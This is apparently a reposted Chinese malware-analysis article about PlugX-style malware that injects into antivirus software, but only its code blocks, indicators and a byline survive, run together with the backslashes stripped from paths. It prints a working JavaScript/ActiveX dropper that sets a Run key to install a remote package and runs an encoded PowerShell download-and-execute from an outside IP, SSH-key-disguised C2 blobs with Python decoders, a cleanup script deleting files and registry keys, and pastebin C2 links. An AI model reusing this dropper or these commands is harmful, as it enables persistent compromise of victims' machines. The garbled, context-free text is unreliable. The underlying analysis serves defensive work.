本文讲的是
屡禁不止:一个敢于将自己注入到杀毒软件中的斗士,
<script> a=new ActiveXObject("WScript.Shell"); a.run('%windir%System32reg.exe add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v MSASCuiL2 /t reg_sz /d "%windir%System32msiexec.exe /q /i hxxp://172.104.65.97/Tasks.png" /f', 0);window.close(); a.run('%windir%SysWOW64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);window.close(); </script>
---- BEGIN SSH2 PUBLIC KEY ---- Comment: "rsa-key" AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd 8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3 /KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps 8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE 2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ= ---- END SSH2 PUBLIC KEY ----
---- BEGIN SSH2 PUBLIC KEY ---- Comment: "rsa-key" AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd 8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3 /KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps 8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE 2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ= ---- END SSH2 PUBLIC KEY ----
import ctypes from ctypes import * with open('mysettings.bin','rb') as f: buffer = f.read() uncompressed_size = len(buffer) * 16 uncompressed = create_string_buffer(uncompressed_size) FinalUncompressedSize = c_ulong(0) nt = windll.ntdll # COMPRESSION_FORMAT_LZNT1 = 2 res = nt.RtlDecompressBuffer(2, uncompressed, uncompressed_size, buffer, len(buffer), byref(FinalUncompressedSize)) if (res == 0): uncompressed = uncompressed[0:FinalUncompressedSize.value]
def plugx_decode(data): decode_key = struct.unpack_from('<I', data, 0)[0] out = '' # XOR Values might possibly be varied. key1 = decode_key ^ 20141118 key2 = decode_key ^ 8389 for c in data[4:]: # ADD/SUB Values might possibly be varied. key1 += 3373 key2 -= 39779 dec = ord(c) ^ (((key2 >> 16) & 0xff ^ ((key2 & 0xff ^ (((key1 >> 16) & 0xff ^ (key1 - (key1 >> 8) & 0xff)) - (key1 >> 24) & 0xff)) - (key2 >> 8) & 0xff)) - (key2 >> 24) & 0xff) out = out + chr(dec) return out
import struct def decode(buf): res = "" for i in range(0, len(buf) -1, 2): dl = ord(buf[i + 1]) dl = dl - 0x41 dl = dl * 0x10 dl = dl + ord(buf[i]) dl = dl - 0x41 res += chr(dl) return res def decode_plugx_pastebin(buf): start = buf.find('DZKS') if start == -1: return None end = buf.find('DZJS', start + 4) if end == -1: return None start += 4 data = buf[start:end] decoded = decode(data) connection_type = struct.unpack_from('<H', decoded, 0)[0] port = struct.unpack_from('<H', decoded, 2)[0] ip = decoded[4:] print "Decoded IP: {}:{}, type: {}".format(ip, port, connection_type) return True decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSGAAALLBAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2q9n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3J=') decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSDAAAAFAAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsAHyLye8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6aBha3q9niJFu2=') decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSEAAABGHBEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2niJ8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9=') decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=')
mscorsvw.exe cscript del.vbs del BlackBox.dll del mscorsvw.exe del BlackBox del explorer.exe cscript del.vbs del %sfxcmd% del mscorsvw.exe del BlackBox.dll del BlackBox del explorer.exe del del.vbs del a.bat del %sfxcmd% del mscorsvw.exe del BlackBox.dll del BlackBox del explorer.exe del del.vbs del a.bat reg delete "HKLMSYSTEMControlSet001servicesemproxy" /f reg delete "HKLMSYSTEMControlSet002servicesemproxy" /f reg delete "HKLMSYSTEMCurrentControlSetservicesemproxy" /f reg delete "HKLMSYSTEMControlSet001servicesEmpPrx" /f reg delete "HKLMSYSTEMControlSet002servicesEmpPrx" /f reg delete "HKLMSYSTEMCurrentControlSetservicesEmpPrx" /f reg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASAPI32" /f reg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASMANCS" /f reg delete "HKU.DEFAULTSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f del /s c:windowstemp*.bat del /s c:windowstemp*.dat del /s c:windowstemp*.dll del /s c:windowstemp*.exe del /s c:windowstemp*.vbs del %0
https//pastebin.com/eSsjmhBG https://pastebin.com/PSxQd6qw https://pastebin.com/CzjM9qwi https://pastebin.com/xHDSxxMD %ProgramData%arm2sv1k DSSM DSSM Microsoft Office Document Update Utility SoftwareMicrosoftWindowsCurrentVersionRun JmLI %ProgramFiles(x86)%SophosAutoUpdateALUpdate.exe %ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exe %ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exe %windir%system32FlashPlayerApp.exe slax pastebin mahTszuBzqwUTcGt %ProgramData%arm2sv1kAkgcl
原文发布时间为:2017年7月3日
本文作者:xiaohui
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。